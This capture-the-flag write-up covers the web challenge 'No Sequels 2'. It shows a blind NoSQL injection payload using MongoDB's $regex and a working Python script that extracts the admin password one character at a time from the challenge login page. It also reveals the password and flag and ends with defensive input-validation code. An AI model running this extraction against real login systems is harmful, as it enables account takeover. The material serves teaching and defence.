No Sequels 2

Category: Web
Points: 80
Description: This is the sequel to No Sequels. You’ll see the challenge page once you solve the first one.

From here we are given the following code. We need the actual admin password to get the flag, but, as we can see from the code, our input isn't used in any part of the database query. So we need to find another route. I was stuck on this for a while, but then I thought: hey, I can utilise the other injection method to extract data.

Looking for a way to get blind NoSQL injection, I came across the $regex operator, which is perfect!

So here is the payload that I will send:

{
    username: "admin",
    password: {"$regex": "^<testing pw goes here>"}
}

So I loop over the character set: if I successfully log in, it means I have found the first character of the password; if not, I try the next one. Once I have a character, I check for the next one by sending both together as the prefix. I wrote a Python script to automate this and make it quicker:

import requests
import urllib3
import string

urllib3.disable_warnings()

username = "admin"
password = ""
url = "https://nosequels.2019.chall.actf.co/login"

# token from solving the first challenge; needed to reach this login page
cookies = {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1NzI4MjkyfQ.DRgByuPZJc-Ayvmdec5ot2CbjbCe6Bf7ucvI93gc1Wc"
}

# regex metacharacters are skipped rather than escaped so the prefix is matched literally
skip = ['*', '+', '.', '?', '|']

while True:
    for c in string.printable:
        if c in skip:
            continue
        print("Testing %s" % (password + c))
        payload = {
            "username": username,
            "password": {
                "$regex": "^" + password + c
            }
        }

        r = requests.post(url, json=payload, verify=False, cookies=cookies)
        print(r.text)
        # the response to a successful login contains "bad", so the prefix matched
        if "bad" in r.text:
            print("Found one more char : %s" % (password + c))
            password += c
            break
    else:
        # no character extended the prefix, so the whole password has been recovered
        break

print("Password: %s" % password)

This slowly prints out the password, which ends up being:

congratsyouwin

Entering that on the final page successfully logs us in and we get the flag.

FLAG:

actf{still_no_sql_in_the_sequel}
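From the defender's side the fix sits at the input boundary: the login handler must refuse anything but plain strings, so a body carrying an operator object like the $regex payload above never reaches the query. The following is an added example (not code from this writeup or from the challenge), with a constructed in-memory user store standing in for MongoDB:

```python
import hashlib
import hmac
import os

def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-SHA256 stands in for whatever slow password hash the real app uses
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Constructed sample user store (username -> (salt, hash)), playing the role of
# the MongoDB users collection; the plaintext is the challenge password.
_SALT = os.urandom(16)
USERS = {"admin": (_SALT, _hash_password("congratsyouwin", _SALT))}

class InvalidCredentialFormat(ValueError):
    """A login field is not a plain string, e.g. an operator object like {"$regex": ...}."""

def validate_login_body(body: object) -> tuple[str, str]:
    """Accept exactly {"username": <str>, "password": <str>}.

    A JSON body parser hands the handler whatever type the client sent, so the
    writeup's payload arrives with a dict as the password. Rejecting every
    non-string value (and any extra key) means no operator object can reach
    the database query.
    """
    if not isinstance(body, dict) or set(body) != {"username", "password"}:
        raise InvalidCredentialFormat("expected exactly username and password")
    for field in ("username", "password"):
        value = body[field]
        if not isinstance(value, str) or not 0 < len(value) <= 256:
            raise InvalidCredentialFormat(f"{field} must be a non-empty string")
    return body["username"], body["password"]

def login(body: object, users: dict = USERS) -> bool:
    """True only for a well-formed body whose password matches the stored hash.

    The lookup uses the validated username alone; the password never becomes
    part of the query filter (the pattern that let $regex leak it one
    character at a time) and is compared in constant time.
    """
    try:
        username, password = validate_login_body(body)
    except InvalidCredentialFormat:
        return False
    record = users.get(username)  # stands in for db.users.find_one({"username": username})
    if record is None:
        return False
    salt, stored = record
    return hmac.compare_digest(_hash_password(password, salt), stored)
```

With this shape the server can still be probed with wrong passwords, but each attempt only ever answers yes or no for one complete guess, so the character-by-character oracle disappears.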
